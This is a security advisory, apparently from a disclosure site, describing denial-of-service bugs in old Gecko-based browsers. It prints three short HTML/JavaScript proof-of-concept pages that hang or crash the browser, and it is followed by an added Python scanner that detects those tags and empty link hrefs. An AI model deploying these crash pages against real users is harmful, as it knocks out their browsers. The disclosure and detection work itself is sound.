The Gecko engine does not handle specific tags correctly and does not validate links correctly, allowing attackers to cause a denial of service (DoS) on the machine running the Gecko engine.
Credit:
The information has been provided by Juha-Matti Laurio.
The bug report can be found at: https://bugzilla.mozilla.org/show_bug.cgi?id=210658
The proof of concept for the tag handling issue can be found at: http://www.milw0rm.com/id.php?id=1253
The proof of concept for the link tag issue can be found at: http://www.milw0rm.com/id.php?id=1257
Vulnerable Systems:
* Netscape Browser version 8.0.3.3
* Netscape version 7.2
* K-Meleon version 0.9
* Firefox version 1.0.7 and prior
* Mozilla suite version 1.7.12 and prior
Tag handling:
The Gecko engine is vulnerable to a DoS when handling two tags:
* <sourcetext>
* <parsererror>
By using one of these tags, it is possible to cause the system to hang with 100% CPU usage; the only way to recover is to kill the application.
Proof of Concept 1:
<html>
<head>
<title>sourcetext element test</title>
</head>
<body>
<p><sourcetext></sourcetext></p>
</body>
</html>
Proof of Concept 2:
<html>
<head>
<title>parsererror element test</title>
</head>
<body>
<p><parsererror></parsererror></p>
</body>
</html>
JavaScript link:
By adding a link tag using JavaScript with an empty, incomplete href value, it is possible to cause Gecko-based web browsers to crash.
Proof of Concept:
<!-- Brought to you By Kubbo. Now bring Kubbo the walrus; Goo-goo-gajoob. -->
<html>
<script language="JavaScript">
document.write('<link rel="stylesheet" href="http://">');
</script>
</html>
<!-- Affects Firefox 1.0.7 and below. Adaras ron r farliga. -->
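
A content-filter check for the two conditions described above, as an added example (not part of the original advisory or of Mozilla's code): it flags the sourcetext and parsererror elements and any link tag whose href is a scheme with no host, including one built inside a document.write() string. The function names, finding labels and sample documents are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Element names the advisory ties to the hang.
SUSPECT_TAGS = {"sourcetext", "parsererror"}
# <link ... href=...>, matched on the raw text so that markup built inside a
# document.write() string is covered as well as static markup.
LINK_HREF = re.compile(r"""<link\b[^>]*?\bhref\s*=\s*(["']?)([^"'\s>]*)\1""", re.I)


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        if tag in SUSPECT_TAGS:  # HTMLParser lowercases tag names
            self.found.add(tag)


def href_lacks_host(href):
    """True for a scheme-only URL such as 'http://' (no host part)."""
    try:
        parts = urlsplit(href)
    except ValueError:  # malformed URL, e.g. a broken IPv6 literal
        return False
    return parts.scheme in ("http", "https") and not parts.netloc


def scan(html):
    """Return the sorted list of findings for one HTML document."""
    collector = _TagCollector()
    collector.feed(html)
    collector.close()
    findings = {f"element:{tag}" for tag in collector.found}
    for match in LINK_HREF.finditer(html):
        if href_lacks_host(match.group(2)):
            findings.add(f"link-href:{match.group(2)}")
    return sorted(findings)


# Constructed sample documents (the last one is a normal stylesheet link).
SAMPLE_TAG = "<html><body><p><sourcetext></sourcetext></p></body></html>"
SAMPLE_LINK = ("<html><script>document.write("
               "'<link rel=\"stylesheet\" href=\"http://\">');</script></html>")
SAMPLE_CLEAN = ('<html><head><link rel="stylesheet" '
                'href="http://example.com/site.css"></head></html>')
```

The raw-text match for link tags can also fire on markup that only appears inside comments or inert strings, so treat a finding as a reason to inspect the page rather than as proof.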